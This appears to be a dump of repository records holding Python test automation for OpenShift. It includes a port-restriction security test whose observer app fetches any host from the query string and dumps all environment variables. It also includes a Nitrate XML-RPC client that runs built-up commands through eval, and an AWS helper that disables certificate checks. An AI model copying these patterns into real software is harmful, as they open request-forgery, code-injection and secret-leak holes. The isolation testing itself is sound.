ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value) for key, value in sorted(environ.items())]\n response_body = '\\\\n'.join(response_body)\n\n elif environ['PATH_INFO'] == '/open':\n ctype = 'application/json'\n body = dict()\n try:\n #callurl = \"http://\" + contests[int(environ['QUERY_STRING'])-1] + \":8080/health\"\n callurl = \"http://\" + environ['QUERY_STRING'] + \":8080/health\"\n body['callurl'] = callurl\n body['reason'] = \"OK: %s\"%(urllib2.urlopen(callurl).read())\n body['return'] = 0\n except urllib2.URLError, e:\n body['return'] = 113\n body['reason'] = \"URL Error: %s\" % str(e)\n response_body = json.dumps(body)\n except urllib2.HTTPError, e:\n response_body = '{\"return\" : 1, \"reason\" : \"HTTP Error: %s\"}' % str(e)\n except Exception, e:\n body['return'] = 1\n body['reason'] = \"Other Error: %s\" % str(e)\n\n response_body = json.dumps(body)\n \n elif environ['PATH_INFO'] == \"/bind\":\n try:\n sockhop = (binders[int(environ['QUERY_STRING'])-1], 8080)\n socksrv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socksrv.bind(sockhop)\n socksrv.close()\n response_body = \"Successfully Opened %s:%d\" % sockhop\n except Exception, e:\n response_body = \"Exception: %s\\\\n\\\\n\" % str(e)\n \n elif environ['PATH_INFO'] == '/mopen':\n try:\n callurl = \"http://\" + cmirror[int(environ['QUERY_STRING'])-1] + \":8080/health\"\n response_body = urllib2.urlopen(callurl).read()\n response_body += \"\\\\n\\\\n\"\n except urllib2.URLError, e:\n response_body = \"URL Error: %s\\\\n\\\\n\" % str(e)\n except urllib2.HTTPError, e:\n response_body = \"HTTP Error: %s\\\\n\\\\n\" % str(e)\n except Exception, e:\n response_body = \"Other Error: %s\\\\n\\\\n\" % str(e)\n \n elif environ['PATH_INFO'] == \"/mbind\":\n try:\n sockhop = (bmirror[int(environ['QUERY_STRING'])-1], 8080)\n socksrv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socksrv.bind(sockhop)\n socksrv.close()\n response_body = \"Successfully Opened %s:%d\" % sockhop\n except Exception, e:\n response_body = \"Exception: %s\\\\n\\\\n\" % str(e)\n\n elif environ['PATH_INFO'] == \"/mbopen\":\n try:\n sockhop = (bmirror[int(environ['QUERY_STRING'])-1], 8080)\n socksrv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socksrv.connect(sockhop)\n socksrv.close()\n response_body = \"Successfully Opened %s:%d\" % sockhop\n except Exception, e:\n response_body = \"Exception: %s\\\\n\\\\n\" % str(e)\n\n else:\n ctype = 'text/html'\n ctype = 'application/json'\n response_body = '{ \"return\" : \"200\"}'\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == \"__main__\":\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()'''\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US1656][Runtime][Security] Restrict port connections\"\n self.app_name = 'portcon'\n self.app_type = 'python'\n try:\n self.app_type2 = self.config.test_variant\n except:\n self.app_type2 = 'php'\n tcms_testcase_id = 129219\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name, self.app_name2))\n\nclass RestrictPortConnections(OpenShiftTest):\n def test_method(self):\n self.info(\"1. Create an observer app\") \n ret = common.create_app(self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n True)\n self.assert_equal(ret,0, \"App should be created\")\n\n\n self.info(\"2. Modify the observer %s\"%self.app_name)\n ret = common.command_get_status('''\n cd %s &&\n cat <<EOF >wsgi/application &&\n%s\nEOF\n git commit -m \"Changed APP\" -a && git push\n '''%(self.app_name, ObserverGenerator.get_application()))\n self.assert_equal(ret,0, \"App should be created\")\n\n for app_t in ('php', 'python', 'perl', 'rack'):\n self.app_name2 = \"%s%s\"%(self.app_name,app_t)\n\n self.info(\"3x. Create target App %s\"%self.app_name2) \n ret = common.create_app(self.app_name2,\n common.app_types[app_t], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n False)\n self.assert_equal(ret,0, \"Second application should be deployed.\")\n\n self.info(\"4x. Verify http connection to %s\"%self.app_name2)\n self.verify(self.app_name, self.app_name2, [('return',113)])\n self.assert_equal(ret,0, \"It should not be allowed to connect from %s->%s\"%(self.app_name, self.app_name2))\n\n self.info(\"5x. Delete it\") \n ret = common.destroy_app(self.app_name2, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret,0, \"App should be destroyed\")\n\n self.info(\"6x. Verify self\") \n self.verify(self.app_name, self.app_name, [('return',0)])\n self.assert_equal(ret,0, \"App should be verified\")\n\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def get_internal_ip_address(self, app_name):\n (status, output) = common.run_remote_cmd(app_name,'echo IP=$OPENSHIFT_INTERNAL_IP')\n obj = re.search(r\"IP=(\\d+\\.\\d+\\.\\d+\\.\\d+)\",output)\n if obj:\n #print \"DEBUG: OPENSHIFT_INTERNAL_IP=%s\"%obj.group(1)\n return obj.group(1)\n print \"ERROR: Unable to get internal IP\"\n return None\n\n def verify(self, app_name, target_app_name, conditions):\n url = OSConf.get_app_url(app_name)\n tocheck_url = self.get_internal_ip_address(target_app_name)\n return common.check_json_web_page(\"%s/open?%s\"%(url, tocheck_url), conditions)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RestrictPortConnections)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of restrict_port_connections.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6273739337921143, "alphanum_fraction": 0.6509495973587036, "avg_line_length": 23.629032135009766, "blob_id": "0cd8880142a11570e856c6aafda7efdd7f876376", "content_id": "72702e56784aab0e8380dcafdd5a70c842d7d105", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1527, "license_type": "no_license", "max_line_length": 172, "num_lines": 62, "path": "/automation/open/testmodules/RT/cartridge/mongodb22.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nSept 19, 2012\n\"\"\"\nimport rhtest\nimport common\nimport database\n#### test specific import\n\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n self.summary = \"[US2755] MongoDB 2.2\"\n\tself.application_name = common.getRandomString()\n\tself.application_type = common.app_types[\"php\"]\n pass\n\n def record_results(self, resid):\n pass\n\n def finalize(self):\n pass\n \n\nclass MongoDB22Test(OpenShiftTest):\n def test_method(self):\n self.info(\"=\" * 80)\n\tself.info(\"Creating a PHP application\")\n self.info(\"=\" * 80)\n\tcommon.create_app(self.application_name, self.application_type, clone_repo = False)\n\t\n self.info(\"=\" * 80)\n\tself.info(\"Embedding MongoDB cartridge\")\n self.info(\"=\" * 80)\n\tcommon.embed(self.application_name, \"add-\" + common.cartridge_types[\"mongodb\"])\n\n self.info(\"=\" * 80)\n\tself.info(\"Checking the version of MongoDB\")\n self.info(\"=\" * 80)\n\t( ret_code, ret_output ) = common.run_remote_cmd(self.application_name, \"eval $(cat mongodb-2.2/pid/mongodb.pid | xargs -I{} ps -p {} -o cmd= | cut -d' ' -f1) --version\")\n\tself.assert_true(ret_output.find(\"db version v2.2\") != -1, \"MongoDB version must be in branch 2.2\")\n\n\t# everything is OK\n\treturn self.passed(self.summary)\n\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MongoDB22Test)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6606805324554443, "alphanum_fraction": 0.6625708937644958, "avg_line_length": 34.266666412353516, "blob_id": "a52ac8447274bd08f6f084badcc4e84c8a0c9794", "content_id": "5cadcb8c8008ebee8fffe0613dcda2035e6c406c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1058, "license_type": "no_license", "max_line_length": 175, "num_lines": 30, "path": "/open_automation/bin/create_instance.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\nsys.path.append(lib_path)\nfrom helper import *\n\n\ndef main():\n usage = \"\"\"\nusage: %s -m devenv_xxx [-n QE_devenv_xxx] [-z xxx]\n\"\"\" %(os.path.basename(__file__))\n\n from optparse import OptionParser\n parser = OptionParser(usage=usage)\n parser.add_option(\"-m\", \"--ami\", dest=\"ami\", help=\"Instance Arguments: Launch openshift instance from this ami.\")\n parser.add_option(\"-n\", \"--instance_tag\", dest=\"instance_tag\", help=\"Instance Arguments: Instance tag for the newly launched instance\")\n parser.add_option(\"-z\", \"--image_size\", dest=\"image_size\", default='m1.medium', help=\"Instance Arguments: Specify size for launching instance. By default it is m1.medium\")\n\n (options, args) = parser.parse_args()\n #print \"-->\", options\n #print \"-->\", args\n create_node(options.instance_tag, options.ami, options.image_size)\n\n\n\nif __name__ == \"__main__\":\n exit_code=main()\n sys.exit(exit_code)\n" }, { "alpha_fraction": 0.677570104598999, "alphanum_fraction": 0.7196261882781982, "avg_line_length": 22.77777862548828, "blob_id": "a1432db608cbe36fbd967ab63a7fac06368b94a7", "content_id": "e0414d8da4b3a660bb7f033e59dc612df2a4d3a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 214, "license_type": "no_license", "max_line_length": 56, "num_lines": 9, "path": "/automation/debuglistener/cmdrobot.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\n\nloglevel = \"--loglevel=DEBUG\"\nlistener = \"--listener=listener.TCMSListener:8243:52490\"\n\nproject_path = './debuglistener/keyword_driven.txt'\n\ncmd = 'pybot %s %s' % (loglevel, project_path)\nos.system(cmd)\n" }, { "alpha_fraction": 0.5673466920852661, "alphanum_fraction": 0.573975682258606, "avg_line_length": 35.76050567626953, "blob_id": "e03d2c36ab43a80026182b92960b857a30202cd3", "content_id": "32d596d3530b114016d6850eac7b0c6a06e3ab05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17499, "license_type": "no_license", "max_line_length": 109, "num_lines": 476, "path": "/automation/open/lib/nitrate.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nUse this class to access Nitrate via XML-RPC\nThis code is based on http://landfill.bugzilla.org/testopia2/testopia/contrib/drivers/python/testopia.py\nand https://fedorahosted.org/python-bugzilla/browser/bugzilla/base.py\n\nExample on how to access this library,\n\nfrom nitrate import NitrateXmlrpc\n\nn = NitrateXmlrpc.from_config('config.cfg')\nn.testplan_get(10)\n\nwhere config.cfg looks like:\n[nitrate]\nusername: [email protected]\npassword: foobar\nurl: https://tcms.engineering.redhat.com/xmlrpc/\nuse_mod_kerb: False\n\nOr, more directly:\n\nn = NitrateXmlrpc(\n '[email protected]',\n 'foobar',\n 'https://tcms.engineering.redhat.com/xmlrpc/',\n)\nn.testplan_get(10)\n\"\"\"\n\nimport xmlrpclib, urllib2, httplib, kerberos\nfrom types import *\nfrom datetime import datetime, time\n\nfrom cookielib import CookieJar\nimport os\n\nVERBOSE = 0\nif os.getenv('RHTEST_DEBUG'):\n DEBUG = 1 \nelse:\n DEBUG = 0 \n\nclass CookieResponse:\n '''Fake HTTPResponse object that we can fill with headers we got elsewhere.\n We can then pass it to CookieJar.extract_cookies() to make it pull out the\n cookies from the set of headers we have.'''\n def __init__(self,headers): \n self.headers = headers\n #log.debug(\"CookieResponse() headers = %s\" % headers)\n def info(self): \n return self.headers\n\n\nclass CookieTransport(xmlrpclib.Transport):\n '''A subclass of xmlrpclib.Transport that supports cookies.'''\n cookiejar = None\n scheme = 'http'\n \n # Cribbed from xmlrpclib.Transport.send_user_agent \n def send_cookies(self, connection, cookie_request):\n if self.cookiejar is None:\n self.cookiejar = CookieJar()\n elif self.cookiejar:\n # Let the cookiejar figure out what cookies are appropriate\n self.cookiejar.add_cookie_header(cookie_request)\n # Pull the cookie headers out of the request object...\n cookielist=list()\n for h,v in cookie_request.header_items():\n if h.startswith('Cookie'):\n cookielist.append([h,v])\n # ...and put them over the connection\n for h,v in cookielist:\n connection.putheader(h,v)\n \n # This is the same request() method from xmlrpclib.Transport,\n # with a couple additions noted below\n def request_with_cookies(self, host, handler, request_body, verbose=0):\n h = self.make_connection(host)\n if verbose:\n h.set_debuglevel(1)\n\n # ADDED: construct the URL and Request object for proper cookie handling\n request_url = \"%s://%s%s\" % (self.scheme,host,handler)\n #log.debug(\"request_url is %s\" % request_url)\n cookie_request = urllib2.Request(request_url) \n\n self.send_request(h,handler,request_body)\n self.send_host(h,host) \n self.send_cookies(h,cookie_request) # ADDED. creates cookiejar if None.\n self.send_user_agent(h)\n self.send_content(h,request_body)\n\n errcode, errmsg, headers = h.getreply()\n\n # ADDED: parse headers and get cookies here\n cookie_response = CookieResponse(headers)\n # Okay, extract the cookies from the headers\n self.cookiejar.extract_cookies(cookie_response,cookie_request)\n #log.debug(\"cookiejar now contains: %s\" % self.cookiejar._cookies)\n # And write back any changes\n if hasattr(self.cookiejar,'save'):\n try:\n self.cookiejar.save(self.cookiejar.filename)\n except Exception, e:\n raise\n #log.error(\"Couldn't write cookiefile %s: %s\" % \\\n # (self.cookiejar.filename,str(e)))\n\n if errcode != 200:\n raise xmlrpclib.ProtocolError(\n host + handler,\n errcode, errmsg,\n headers\n )\n\n self.verbose = verbose\n\n try:\n sock = h._conn.sock\n except AttributeError:\n sock = None\n\n return self._parse_response(h.getfile(), sock)\n\n # This is just python 2.7's xmlrpclib.Transport.single_request, with\n # send additions noted below to send cookies along with the request\n def single_request_with_cookies(self, host, handler, request_body, verbose=0):\n h = self.make_connection(host)\n if verbose:\n h.set_debuglevel(1)\n\n # ADDED: construct the URL and Request object for proper cookie handling\n request_url = \"%s://%s%s\" % (self.scheme,host,handler)\n #log.debug(\"request_url is %s\" % request_url)\n cookie_request = urllib2.Request(request_url)\n\n try:\n self.send_request(h,handler,request_body)\n self.send_host(h,host)\n self.send_cookies(h,cookie_request) # ADDED. creates cookiejar if None.\n self.send_user_agent(h)\n self.send_content(h,request_body)\n\n response = h.getresponse(buffering=True)\n\n # ADDED: parse headers and get cookies here\n cookie_response = CookieResponse(response.msg)\n # Okay, extract the cookies from the headers\n self.cookiejar.extract_cookies(cookie_response,cookie_request)\n #log.debug(\"cookiejar now contains: %s\" % self.cookiejar._cookies)\n # And write back any changes\n if hasattr(self.cookiejar,'save'):\n try:\n self.cookiejar.save(self.cookiejar.filename)\n except Exception, e:\n raise\n #log.error(\"Couldn't write cookiefile %s: %s\" % \\\n # (self.cookiejar.filename,str(e)))\n\n if response.status == 200:\n self.verbose = verbose\n return self.parse_response(response)\n except xmlrpclib.Fault:\n raise\n except Exception:\n # All unexpected errors leave connection in\n # a strange state, so we clear it.\n self.close()\n raise\n\n #discard any response data and raise exception\n if (response.getheader(\"content-length\", 0)):\n response.read()\n raise xmlrpclib.ProtocolError(\n host + handler,\n response.status, response.reason,\n response.msg,\n )\n\n # Override the appropriate request method\n if hasattr(xmlrpclib.Transport, 'single_request'):\n single_request = single_request_with_cookies # python 2.7+\n else:\n request = request_with_cookies # python 2.6 and earlier\n\nclass SafeCookieTransport(xmlrpclib.SafeTransport,CookieTransport):\n '''SafeTransport subclass that supports cookies.'''\n scheme = 'https'\n # Override the appropriate request method\n if hasattr(xmlrpclib.Transport, 'single_request'):\n single_request = CookieTransport.single_request_with_cookies\n else:\n request = CookieTransport.request_with_cookies\n\n# Stolen from FreeIPA source freeipa-1.2.1/ipa-python/krbtransport.py\nclass KerbTransport(SafeCookieTransport):\n \"\"\"Handles Kerberos Negotiation authentication to an XML-RPC server.\"\"\"\n \n def get_host_info(self, host):\n host, extra_headers, x509 = xmlrpclib.Transport.get_host_info(self, host)\n \n # Set the remote host principal\n h = host\n hostinfo = h.split(':')\n service = \"HTTP@\" + hostinfo[0]\n \n try:\n rc, vc = kerberos.authGSSClientInit(service);\n except kerberos.GSSError, e:\n raise kerberos.GSSError(e)\n \n try:\n kerberos.authGSSClientStep(vc, \"\");\n except kerberos.GSSError, e:\n raise kerberos.GSSError(e)\n \n extra_headers = [\n (\"Authorization\", \"negotiate %s\" % kerberos.authGSSClientResponse(vc) )\n ]\n \n return host, extra_headers, x509\n\nclass NitrateError(Exception):\n pass\n\nclass NitrateXmlrpcError(Exception):\n def __init__(self, verb, params, wrappedError):\n self.verb = verb\n self.params = params\n self.wrappedError = wrappedError\n \n def __str__(self):\n return \"Error while executing cmd '%s' --> %s\" \\\n % ( self.verb + \"(\" + self.params + \")\", self.wrappedError)\n\nclass NitrateXmlrpc(object):\n \"\"\"\n NitrateXmlrpc - Nitrate XML-RPC client\n for server deployed without BASIC authentication\n \"\"\"\n @classmethod\n def from_config(cls, filename):\n from ConfigParser import SafeConfigParser\n cp = SafeConfigParser()\n cp.read([filename])\n kwargs = dict(\n [(key, cp.get('nitrate', key)) for key in [\n 'username', 'password', 'url'\n ]]\n )\n \n return NitrateXmlrpc(**kwargs)\n \n def __init__(self, username, password, url, use_mod_auth_kerb = False):\n if url.startswith('https://'):\n self._transport = SafeCookieTransport()\n elif url.startswith('http://'):\n self._transport = CookieTransport()\n else:\n raise \"Unrecognized URL scheme\"\n \n self._transport.cookiejar = CookieJar()\n # print \"COOKIES:\", self._transport.cookiejar._cookies\n self.server = xmlrpclib.ServerProxy(\n url,\n transport = self._transport,\n verbose = VERBOSE\n )\n \n # Login, get a cookie into our cookie jar:\n login_dict = self.do_command(\"Auth.login\", [dict(\n username = username,\n password = password,\n )])\n \n # Record the user ID in case the script wants this\n # self.user_id = login_dict['id']\n # print 'Logged in with cookie for user %i' % self.userId\n # print \"COOKIES:\", self._transport.cookiejar._cookies\n \n def _boolean_option(self, option, value):\n \"\"\"Returns the boolean option when value is True or False, else ''\n \n Example: _boolean_option('isactive', True) returns \" 'isactive': 1,\"\n \"\"\"\n if value or str(value) == 'False':\n if type(value) is not BooleanType:\n raise NitrateError(\"The value for the option '%s' is not of boolean type.\" % option)\n elif value == False:\n return \"\\'%s\\':0, \" % option\n elif value == True:\n return \"\\'%s\\':1, \" % option\n return ''\n \n def _datetime_option(self, option, value):\n \"\"\"Returns the string 'option': 'value' where value is a date object formatted\n in string as yyyy-mm-dd hh:mm:ss. If value is None, then we return ''.\n \n Example: self._time_option('datetime', datetime(2007,12,05,13,01,03))\n returns \"'datetime': '2007-12-05 13:01:03'\"\n \"\"\"\n if value:\n if type(value) is not type(datetime(2000,01,01,12,00,00)):\n raise NitrateError(\"The option '%s' is not a valid datetime object.\" % option)\n return \"\\'%s\\':\\'%s\\', \" % (option, value.strftime(\"%Y-%m-%d %H:%M:%S\"))\n return ''\n \n def _list_dictionary_option(self, option, value):\n \"\"\"Verifies that the value passed for the option is in the format of a list\n of dictionaries.\n \n Example: _list_dictionary_option('plan':[{'key1': 'value1', 'key2': 'value2'}])\n verifies that value is a list, then verifies that the content of value are dictionaries.\n \"\"\"\n if value: # Verify that value is a type of list\n if type(value) is not ListType: # Verify that the content of value are dictionaries,\n raise NitrateError(\"The option '%s' is not a valid list of dictionaries.\" % option)\n else:\n for item in value:\n if type(item) is not DictType:\n raise NitrateError(\"The option '%s' is not a valid list of dictionaries.\" % option)\n return \"\\'%s\\': %s\" % (option, value)\n return ''\n \n _list_dict_op = _list_dictionary_option\n \n def _number_option(self, option, value):\n \"\"\"Returns the string \" 'option': value,\" if value is not None, else ''\n \n Example: self._number_option(\"isactive\", 1) returns \" 'isactive': 1,\"\n \"\"\"\n if value:\n if type(value) is not IntType:\n raise NitrateError(\"The option '%s' is not a valid integer.\" % option)\n return \"\\'%s\\':%d, \" % (option, value)\n return ''\n \n def _number_no_option(self, number):\n \"\"\"Returns the number in number. Just a totally useless wrapper :-)\n \n Example: self._number_no_option(1) returns 1\n \"\"\"\n if type(number) is not IntType:\n raise NitrateError(\"The 'number' parameter is not an integer.\")\n return str(number)\n \n _number_noop = _number_no_option\n \n def _options_dict(self, *args):\n \"\"\"Creates a wrapper around all the options into a dictionary format.\n \n Example, if args is ['isactive': 1,\", 'description', 'Voyage project'], then\n the return will be {'isactive': 1,\", 'description', 'Voyage project'}\n \"\"\"\n return \"{%s}\" % ''.join(args)\n \n def _options_non_empty_dict(self, *args):\n \"\"\"Creates a wrapper around all the options into a dictionary format and\n verifies that the dictionary is not empty.\n \n Example, if args is ['isactive': 1,\", 'description', 'Voyage project'], then\n the return will be {'isactive': 1,\", 'description', 'Voyage project'}.\n If args is empty, then we raise an error.\n \"\"\"\n if not args:\n raise NitrateError, \"At least one variable must be set.\"\n return \"{%s}\" % ''.join(args)\n \n _options_ne_dict = _options_non_empty_dict\n \n def _string_option(self, option, value):\n \"\"\"Returns the string 'option': 'value'. If value is None, then ''\n \n Example: self._string_option('description', 'Voyage project') returns\n \"'description' : 'Voyage project',\"\n \"\"\"\n if value:\n if type(value) is not StringType:\n raise NitrateError(\"The option '%s' is not a valid string.\" % option)\n return \"\\'%s\\':\\'%s\\', \" % (option, value)\n return ''\n \n def _string_no_option(self, option):\n \"\"\"Returns the string 'option'.\n \n Example: self._string_no_option(\"description\") returns \"'description'\"\n \"\"\"\n if option:\n if type(option) is not StringType:\n raise NitrateError(\"The option '%s' is not a valid string.\" % option)\n return \"\\'%s\\'\" % option\n return ''\n \n _string_noop = _string_no_option\n \n def _time_option(self, option, value):\n \"\"\"Returns the string 'option': 'value' where value is a time object formatted in string as hh:mm:ss.\n If value is None, then we return ''.\n \n Example: self._time_option('time', time(12,00,03)) returns \"'time': '12:00:03'\"\n \"\"\"\n if value:\n if type(value) is not type(time(12,00,00)):\n raise NitrateError(\"The option '%s' is not a valid time object.\" % option)\n return \"\\'%s\\':\\'%s\\', \" % (option, value.strftime(\"%H:%M:%S\"))\n return ''\n \n def do_command(self, verb, args = []):\n \"\"\"Submit a command to the server proxy.\n \n 'verb' -- string, the xmlrpc verb,\n 'args' -- list, the argument list,\n \"\"\"\n params = ''\n for arg in args:\n params = (\"%s\" % str(arg), \"%s, %s\" % (params, str(arg)))[params!='']\n cmd = \"self.server.\" + verb + \"(\" + params + \")\"\n if DEBUG:\n print cmd\n \n try:\n return eval(cmd)\n except xmlrpclib.Error, e:\n raise NitrateXmlrpcError(verb, params, e)\n \n ############################## Build #######################################\n \n def build_get(self, build_id):\n \"\"\"Get A Build by ID.\n \n 'build_id' -- integer, Must be greater than 0\n \n Example: build_get(10)\n \n Result: A dictionary of key/value pairs for the attributes listed above\n \"\"\"\n return self.do_command(\"Build.get\", [self._number_noop(build_id)])\n \n ############################## User ##################################\n def get_me(self):\n \"\"\"\n Description: Get the information of myself\n \n Returns: A blessed User object Hash\n \"\"\"\n return self.do_command(\"User.get_me\")\n\nclass NitrateKerbXmlrpc(NitrateXmlrpc):\n \"\"\"\n NitrateXmlrpc - Nitrate XML-RPC client\n for server deployed with mod_auth_kerb\n \"\"\"\n def __init__(self, url):\n if url.startswith('https://'):\n self._transport = KerbTransport()\n elif url.startswith('http://'):\n raise \"Apache module mod_ssl is required by mod_auth_kerb for encrypt the communication.\"\n else:\n raise \"Unrecognized URL scheme\"\n \n self._transport.cookiejar = CookieJar()\n # print \"COOKIES:\", self._transport.cookiejar._cookies\n self.server = xmlrpclib.ServerProxy(\n url,\n transport = self._transport,\n verbose = VERBOSE\n )\n \n # Login, get a cookie into our cookie jar:\n login_dict = self.do_command(\"Auth.login_krbv\", [])\n\nif __name__ == \"__main__\":\n from pprint import pprint\n n = NitrateKerbXmlrpc('https://tcms.englab.nay.redhat.com/xmlrpc/')\n pprint(n.get_me())\n\n" }, { "alpha_fraction": 0.5516973733901978, "alphanum_fraction": 0.555691123008728, "avg_line_length": 33.937984466552734, "blob_id": "258e9df6ddc3df2129e948fce7633c0bc2bd62b3", "content_id": "76acf0fca1c95b05d9c7e3056dbc4d742a953341", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9014, "license_type": "no_license", "max_line_length": 146, "num_lines": 258, "path": "/automation/open/lib/aws_console.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport sys\nif sys.platform.startswith('win'):\n #We have to disable CA verification on the Windows boxes...\n #don't know how to fix, but it seems to work without it\n import libcloud.security\n libcloud.security.VERIFY_SSL_CERT = False\n\nfrom libcloud.compute.types import Provider\nfrom libcloud.compute.providers import get_driver\nimport time\nimport paramiko\nimport os\nfrom optparse import OptionParser\nimport datetime\nimport clog\nimport re\n\nlog = clog.get_logger()\nparser = OptionParser()\n\n\ndef ssh_try(host, iterations = 5):\n private_key_file = os.path.expanduser(\"~/.ssh/libra.pem\")\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n mykey = paramiko.RSAKey.from_private_key_file(private_key_file)\n retries = iterations\n can_ssh = False\n while retries !=0:\n try:\n ssh.connect(host, username='root', pkey=mykey)\n can_ssh = True\n break\n except:\n retries -= 1\n #print \"%s Retries: %s\" % (time.ctime(), retries)\n return can_ssh\n\ndef config_parser():\n # these are required options.\n parser.add_option(\"-t\", \"--image_type\", default=\"m1.medium\", help=\"image type (m1.large|m1.small|m1.medium|t1.micro)\") \n parser.add_option(\"-a\", \"--action\", help=\"action you want to take (list|create|store)\")\n parser.add_option(\"-i\", \"--image_name\", help=\"ami_id or devenv number, if none is given, then the latest devenv will be used.\")\n parser.add_option(\"-n\", \"--name\", help=\"name of the instance, if none is given, it will assigned a name pdevenv\") \n (options, args) = parser.parse_args()\n \n # make sure all the ducks are in a row\n if options.action == 'create':\n if options.name is None:\n import uuid\n options.name = \"pdevenv_%s\" % uuid.uuid1().hex[:6]\n log.info(\"No user instance name specified, system will assign auto-generated name \\'%s' as label for the new instance\" % options.name)\n return options, args\n\n\n \nclass AWS_Console(object):\n conn = None\n def __init__(self):\n aws = get_driver(Provider.EC2)\n self._get_credentials()\n self.conn = aws(self.AWSAccessKeyId, self.AWSSecretKey)\n \n def list_nodes(self):\n nodes = self.conn.list_nodes()\n #for node in nodes:\n # print \"name: %s\" % node.name\n return nodes\n \n def list_images(self, filter='self'):\n images = self.conn.list_images(filter)\n log.info(\"Found %s images\" % len(images))\n print(\"ID\\t\\t\\tNAME\")\n print(\"---------------------------------------------------\")\n for image in images:\n print(\"%s\\t %s \\t%s\" % (image.id, image.name, image.extra['tag']))\n #self.info(\"xxx\", 1)\n return images\n\n def get_image(self, ami_id):\n image = self.conn.get_image(ami_id)\n return image\n \n def create_node(self, node_name, image, image_type='m1.medium'):\n \"\"\"\n create an new instance based on image object given.\n \"\"\"\n log.info(\"Creating node: %s with image: %s\" % (node_name, image.id))\n sizes = self.conn.list_sizes()\n instance_size = None\n for img_size in sizes:\n if img_size.id == image_type:\n instance_size = img_size\n break\n\n #if image_type in 'm1.large' or image_type in 't1.micro'\n node = self.conn.create_node(name=node_name, image=image, size=instance_size)\n node_avail = False\n print time.ctime()\n while not node_avail:\n nodes = self.conn.list_nodes()\n\n for n in nodes:\n if n.name == node_name:\n if len(n.public_ip) !=0:\n log.info(\"Node with IP: %s is ready\" % n.public_ip[0])\n node_avail = ssh_try(n.public_ip[0])\n log.info(\"Giving the system time to come up...\")\n time.sleep(120)\n return n\n \n if node_avail:\n log.info(\"Node is ready to be used\")\n break\n time.sleep(10)\n return node\n\n def get_all_devenv_images(self, sort_name=True, tag='qe-ready', pattern='devenv'):\n images = self.conn.list_images('self')\n devenv_images = {}\n for image in images:\n if image.extra['tag'] == tag: # ONLY list images that are 'qe-ready'\n name = image.name.split('/')[1]\n if name.startswith(pattern):\n # sort the array so the first element will be the latest image\n if sort_name:\n image_number = int(name.split('_')[1])\n else:\n image_number = name\n devenv_images[image_number] = image\n #print \"NAME: %s\" % name\n return devenv_images\n\n def get_filtered_image(self, pattern):\n images = self.conn.list_images('self')\n pattern_is_ami = False\n image_found = False\n if pattern.startswith('ami'):\n pattern_is_ami = True\n \n if pattern_is_ami:\n try:\n image = self.get_image(pattern)\n image_found = True\n return image\n \n except:\n log.error(\"Can't find matching ami-id '%s' in AWS repo\" %\n pattern)\n sys.exit(1)\n\n for image in images:\n if pattern in image.name:\n image_found = True\n break\n if not image_found:\n log.error(\"Can't find matching image '%s'in AWS repo\" % pattern)\n sys.exit(1)\n\n return image\n\n\n def get_nodes(self):\n nodes = self.conn.list_nodes()\n return nodes\n \n def get_instance(self, label, running=False):\n \"\"\" returns a node instance given the label \"\"\"\n nodes = self.get_nodes()\n if label.startswith('i-'):\n label_is_name = False \n else:\n label_is_name = True\n for node in nodes:\n if running:\n if node.state != 0: #if not running, let's ignore it\n continue\n if label_is_name:\n if node.name == label:\n return node\n else:\n if node.extra['instanceId'] == label:\n return node\n\n\n def stop_node(self, node_name):\n \n node = self.get_instance(node_name)\n self.conn.ex_stop_node(node)\n res = self.conn.ex_create_tags(node, {'Name': 'terminate-me'})\n return node\n\n\n def _get_credentials(self):\n fr = open(os.path.expanduser(\"~/.awscred\"), 'r')\n content = 